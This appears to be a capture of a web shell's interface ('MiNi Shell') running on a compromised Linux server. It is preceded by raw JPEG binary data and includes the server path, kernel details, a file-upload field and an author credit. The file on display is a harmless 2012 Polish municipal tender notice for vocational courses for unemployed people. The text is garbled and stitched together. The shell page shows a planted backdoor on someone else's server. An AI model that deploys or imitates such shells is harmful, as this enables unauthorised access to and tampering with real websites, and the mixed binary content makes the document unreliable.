JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121024/415658-N-2012.html

<p class="kh_header"><b>Dobieszowice: Część I - PRZEPROWADZENIE KURSÓW I SZKOLEŃ DLA OSÓB BEZROBOTNYCH</b><br>
<b>Numer ogłoszenia: 415658 - 2012; data zamieszczenia: 24.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Bobrownikach , ul. Kościuszki 25 C, 42-584 Dobieszowice, woj. śląskie, tel. 32 287 78 63, faks 32 287 78 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ops.bobrowniki.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I - PRZEPROWADZENIE KURSÓW I SZKOLEŃ DLA OSÓB BEZROBOTNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SZKOLENIE ZAWODOWE O SPECJALNOŚCI -SPRZEDAWCA Z OBSŁUGĄ KAS FISKALNYCH- dla 8 osób
Celem szkolenia jest opanowanie przez uczestników podstawowych czynności niezbędnych do wykonywania zawodu sprzedawcy oraz nabycie umiejętności obsługi kas fiskalnych. Program szkolenia powinien obejmować: obsługę kas fiskalnych - rodzaje urządzeń fiskalnych, podmiotowy i przedmiotowy obowiązek stosowania kas fiskalnych, użycie kas fiskalnych w praktyce, raporty kas fiskalnych, prawne aspekty sprzedaży, fakturowanie i dokumentowanie sprzedaży, zasady identyfikacji fałszywych znaków pieniężnych, techniki sprzedaży, profesjonalna obsługa klienta, aspekty higieniczno - sanitarne.
Szkolenie powinno zawierać część teoretyczną oraz praktyczną
Minimum 48 godzin lekcyjnych szkolenia.

FLORYSTYKA dla 5 osób
Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do wykonywania kompozycji roślinnych o różnej tematyce. W ramach szkolenia uczestnik powinien zdobyć wiedzę na temat: dekoracje roślinne, od niewielkich kompozycji do rozwiązań przestrzennych, podnoszących estetykę otoczenia; kompleksową dekoracją wnętrz, stosując rośliny ozdobne cięte i doniczkowe; wykorzystując w swojej pracy zasady kompozycji plastycznej oraz wiedzę dotyczącą sposobów zagospodarowania przestrzeni oraz dekoracji wnętrz. - wykonywanie projektów dekoracji roślinnych, przygotowywanie materiału roślinnego, suszu i sztucznych roślin do wykonania dekoracji, wykonywanie dekoracji roślinnych różnego typu, utrwalanie roślin różnymi metodami, pakowanie i transport gotowych kompozycji, stylizacja wnętrz materiałem roślinnym. 
Szkolenie powinno zawierać część teoretyczną oraz praktyczną
Minimum 60 godzin lekcyjnych szkolenia.

SZKOLENIE ZAWODOWE O SPECJALNOŚCI OBSŁUGA KOPARKO-ŁADOWARKI dla 5 osób
Celem szkolenia jest przygotowanie uczestników do uzyskania kwalifikacji w zakresie operatora maszyn i urządzeń roboczych, budowlanych i drogowych w zakresie III klasy uprawnień. Minimalny zakres kursu: 
podstawy elektrotechniki, przepisy BHP, budowa maszyn -koparek, silników spalinowych-, elementy hydrauliki, technologia robót dokumentacja techniczna - zajęcia praktyczne. Szkolenie powinno zawierać część teoretyczną oraz praktyczną.
Minimum 176 godzin lekcyjnych szkolenia.

OPIEKA NAD DZIECKIEM I OSOBĄ STARSZĄ dla 4 osób
Celem szkolenia jest przygotowanie uczestników projektu do zawodu opiekunki dla dzieci i nad osobą starszą.
Szkolenie powinno zawierać część teoretyczną oraz praktyczną.
Program szkolenia powinien obejmować m. in.:
anatomia i fizjologia dziecka, opieka nad dzieckiem trudnym, nadpobudliwym, niepełnosprawnym, profilaktyka zdrowotna i prawidłowa dieta, psychologia wychowawcza i rozwojowa wieku dziecięcego, rola i zadania opiekunki dziecięcej - sylwetka opiekunki, twórcze wychowanie dziecka - gry i zabawy ruchowe, literatura dziecięca i współpraca z rodzicami, zasady pierwszej pomocy przedmedycznej, najnowsze koncepcje pedagogiczne i psychologiczne wychowania małego dziecka, anatomia i fizjologia wieku podeszłego -obserwacja chorego, pomiar parametrów-, pielęgnacja chorych  oraz zasady udzielania pierwszej pomocy przedmedycznej, rola opiekuna osób starszych - sylwetka opiekuna, wybrane zagadnienia z farmakologii i psychologii społecznej medycyny, zagadnienia związane ze starzeniem się organizmu, opieka nad umierającymi i towarzyszenie śmierci, zasady żywienia ludzi starszych, warsztaty psychologiczne i aktywizacyjne 
Szkolenie powinno trwać minimum 70 godzin lekcyjnych.

KURS OBSŁUGI BIURA I SEKRETARIATU dla 2 osób
Celem szkolenia jest praktyczne przygotowanie uczestników do pracy w biurze i sekretariacie z umiejętnością obsługi komputera. Pakiet szkoleniowy powinien zawierać oprócz wiedzy teoretycznej z zakresu spraw biurowych, praktyczną naukę obsługi programów Word, Excel, Power Point oraz Internetu, obsługi poczty elektronicznej oraz poruszania się po sieci Internet, jak i kalendarza spotkań. Ponadto celem szkolenia będzie min. omówienie zasad pracy w sekretariacie, obiegu dokumentów, prowadzenia rozmów telefonicznych
Szkolenie powinno zawierać część teoretyczną oraz praktyczną
Minimum 60 godzin lekcyjnych szkolenia.

KURS KOMPUTEROWY dla 2 osób
Celem szkolenia jest nabycie umiejętności obsługi programów Word, Excel, Power Point oraz Internetu na poziomie średniozaawansowanym, w tym przede wszystkim formatowania tekstów i posługiwania się szablonami, przygotowania prezentacji multimedialnych, komunikacji przez Internet m. in. obsługi poczty elektronicznej oraz poruszania się po sieci Internet oraz obsługi systemu operacyjnego i aplikacji biurowych. Szkolenie powinno zawierać część teoretyczną oraz praktyczną.
Minimum 40 godzin lekcyjnych szkolenia.

KURS KOSMETYCZNY dla 2 osób
Celem szkolenia jest teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania kosmetyki. Szkolenie powinno zawierać część teoretyczną oraz praktyczną. W programie kursu powinno znaleźć się m. in: 
specyfika pracy w gabinecie kosmetycznym, budowa, funkcje i choroby skóry, pielęgnacja cery, henna, regulacja brwi, masaż twarzy, szyi i dekoltu, drenaż limfatyczny, masaż relaksacyjny i wygładzający zmarszczki, zabiegi z zastosowaniem maseczek pielęgnacyjnych, depilacja ciała paskowa i bezpaskowa metodą ciepłego wosku, przekłuwanie uszu i oczyszczanie cery, zabiegi z zastosowaniem prądów -galwanizacja, jontoforeza, darsonwalizacja-, mikrodermabrazja diamentowa, peelingi,  zabiegi antycellulitowe oraz relaksacyjne.
Kurs powinien trwać minimum 50 godzin lekcyjnych, 40 godzin to zajęcia praktyczne, a pozostałe 10 godzin kursu to zajęcia teoretyczne.

KURS WIZAŻU I STYLIZACJI PAZNOKCI dla 2 osób 
Celem szkolenia jest teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania profesjonalnego makijażu i stylizacji paznokci. Program szkolenia oraz zagadnienia merytoryczne:
KURS WIZAŻU 
zapoznanie się z właściwościami i cechami skóry. analiza kolorystyczna urody, charakterystyka i kształt twarzy, omówienie cech dobrego makijażu, zapoznanie się z przyborami do wizażu -pędzle i akcesoria-, omówienie kosmetyków do wizażu i poszczególnych rodzajów makijażu
makijaż naturalny, dzienny, wieczorowy, biznesowy, ślubny, wieczorowy, dymny -smoky-eyes-
wykonanie wszystkich makijaży 
KURS STYLIZACJI PAZNOKCI 
MANICURE: zasady dezynfekcji, budowa paznokcia, choroby paznokci i skóry, manicure klasyczny - cążki, pielęgnacja paznokci naturalnych i dłoni, manicure SPA, rekonstrukcja paznokci naturalnych, metoda akrylowa i żelowa 
PEDICURE: pedicure klasyczny - cążki, metoda akrylowa i żelowa
ZDOBIENIA: zatapianie ozdób w akrylu, zdobienia lakierami i farbkami akrylowymi, aplikacja ozdób np. brokaty, cyrkonie, cekiny, hologramy inne
Szkolenie powinno zawierać część teoretyczną oraz praktyczną.
Szkolenie powinno trwać minimum 64 godzin lekcyjnych tj. 32 godz. wizażu i 32 godz. stylizacji paznokci.

KURS KSIĘGOWO - KADROWY dla 1 osoby
Celem szkolenia jest praktyczne przygotowanie uczestników do pracy w księgowości z umiejętnością prowadzenia spraw kadrowych. Pakiet szkoleniowy powinien zawierać m.in. oprócz wiedzy teoretycznej z zakresu spraw księgowych, praktyczną naukę dokonywania operacji na kontach, naliczania i ewidencjonowania podatków, sporządzania i wykorzystywania dokumentów księgowych, sprawozdań finansowych, prowadzenia ksiąg przychodów i rozchodów, dokumentowanie i ewidencja, ryczałt od przychodów ewidencjonowanych, karta podatkowa, wypełnianie deklaracji podatkowej, współpraca z ZUS za pośrednictwem programu Płatnik. Prowadzenie spraw kadrowych, zakładanie teczek osobowych z podziałem na grupy A,B,C, sporządzanie umów o pracę, tworzenie zakresów czynności i innych niezbędnych dokumentów dla osób nowo przyjętych. Szczegółowe zapoznanie z zagadnieniami dotyczącymi zasad naliczania i udzielania urlopów wypoczynkowych. Zdobycie umiejętności wyliczania wynagrodzenia za urlop wypoczynkowy i ekwiwalentu za niewykorzystany urlop w różnych sytuacjach i różnych składnikach wynagrodzenia Zapoznanie z takimi aspektami czasu pracy. Zapoznanie z zasadami wyliczania wynagrodzenia za godziny nadliczbowe. 
Program szkolenia - minimum 100 godzin w tym minimum 50 godzin zajęć praktycznych przy wykorzystaniu programów komputerowych 
W trakcie zajęć praktycznych -50 godzin, dotyczy prowadzenia księgi przychodów i rozchodów, programu Płatnik - wykonawca zapewnia 1 stanowisko komputerowe dla każdego uczestnika szkolenia.

KURS WYCHOWAWCY KOLONIJNEGO dla 1 osoby.
Celem szkolenia jest zdobycie uprawnień do pracy w charakterze wychowawcy/opiekuna na koloniach, obozach, zimowiskach i innych formach zorganizowanego wypoczynku dla dzieci i młodzieży szkolnej.
Program kursu powinien obejmować zajęcia teoretyczne i praktyczne zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 19 lutego 1997 r. -Dz. U. nr 18 poz. 102- zawarty jest -program kursu przygotowawczego dla kandydatów na wychowawców placówek wypoczynku dla dzieci i młodzieży-, m. in.:
Organizacja wypoczynku dzieci i młodzieży. Organizacja zajęć w placówce wypoczynku. Planowanie pracy wychowawczo-opiekuńczej. Obowiązki wychowawcy grupy. Wychowanie fizyczne i sport w placówce wypoczynku. Turystyka i krajoznawstwo. Zajęcia kulturalno-oświatowe. Zajęcia praktyczno-techniczne. Prace społecznie użyteczne. Bezpieczeństwo życia i zdrowia uczestników placówek wypoczynku. 
Kurs trwa minimum 36 godzin lekcyjnych: 18 godzin wykłady i 18 godz. ćwiczenia. 

KURS JĘZYKA MIGOWEGO I i II stopnia dla 1 osoby
Celem kursów języka migowego jest: praktyczne opanowanie daktylkografii i ideografii. W wyniku zorganizowanego procesu kształcenia słuchacz powinien:
poznać podstawy problematyki środowiska osób niesłyszących w zakresie stosowania różnych środków technicznych, komunikowania się z osobami głuchymi oraz pracy tłumacza języka migowego, 
opanować praktycznie ok. 1100 podstawowych znaków pojęciowych języka migowego oraz technikę ich używania zgodnie z zasadami systemu języka migowego
samodzielnie formułować i przekazywać informacje w systemie językowo-migowym.
Kurs języka migowego powinien trwać:
I stopień podstawowy -60 godzin lekcyjnych
II stopień  doskonalący -60 godzin lekcyjnych

SZKOLENIE ZAWODOWE O SPECJALNOŚCI SPAWACZ M/G dla 1 osoby
Celem szkolenia jest przygotowanie uczestników do uzyskania kwalifikacji w zawodzie spawacz metodami: 
MAG 135 - spoinami pachwinowymi elektrodą topliwą w osłonie gazów aktywnych CO2, argon 
MIG 131 - spoinami pachwinowymi elektrodą topliwą w osłonie gazów obojętnych -argon 
Kursy spawania powinny być zorganizowane na podstawie atestu uprawniającego do szkolenia i egzaminowania spawaczy. 
Szkolenie powinno zawierać część teoretyczną oraz praktyczną.
Kurs powinien obejmować minimum 100 godzin lekcyjnych.
Osoby kończące kurs otrzymują: Zaświadczenie o ukończeniu kursu oraz Książkę spawacza wydaną przez Instytut Spawalnictwa. 

KURS KONSERWACJI POWIERZCHNI PŁASKICH I OBSŁUGA URZĄDZEŃ SPRZĄTAJĄCYCH -sprzątaczka dla 1 osoby
Celem kursu jest zdobycie wiedzy i umiejętności konserwatora powierzchni płaskich -sprzątaczki - która zajmuje się zawodowo sprzątaniem, czyli utrzymaniem czystości i porządku - w biurach, hotelach, placówkach handlowych, obiektach przemysłowych lub w domach prywatnych.
Szkolenie powinno zawierać następujący zakres tematyczny:
zasady bezpieczeństwa i higieny pracy, zasady bezpiecznej pracy przy maszynach
nowoczesne urządzenia sprzątające oraz środki czyszczące oraz rodzaje obiektów i specyfikacja ich sprzątania
praktyczna obsługa i wykorzystanie nowoczesnych urządzeń sprzątających
Liczba godzin szkolenia ogółem min 70 godzin lekcyjnych

Wszystkie w/w szkolenia teoretyczne powinno być przeprowadzone w Gminie Bobrowniki lub w ościennym mieście lub gminie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przeprowadzenie kursów i szkoleń dla osób bezrobotnych do 50 % wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.53.10.00-5, 80.53.31.00-0, 39.22.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z SIWZ - na podstawie certyfikatów, zaświafczeń i oświadczeń</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie porzedstawionej oferty zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zgodnie z SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na podstawie SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bobrowniki.pl; http://ops.bobrowniki.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Bobrownikach 42-584 Dobieszowice ul. Kościuszki 25 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Bobrownikach 42-584 Dobieszowice ul. Kościuszki 25 c.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach realizacji projektu systemowego Szansa na lepszą przyszłość Priorytet 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com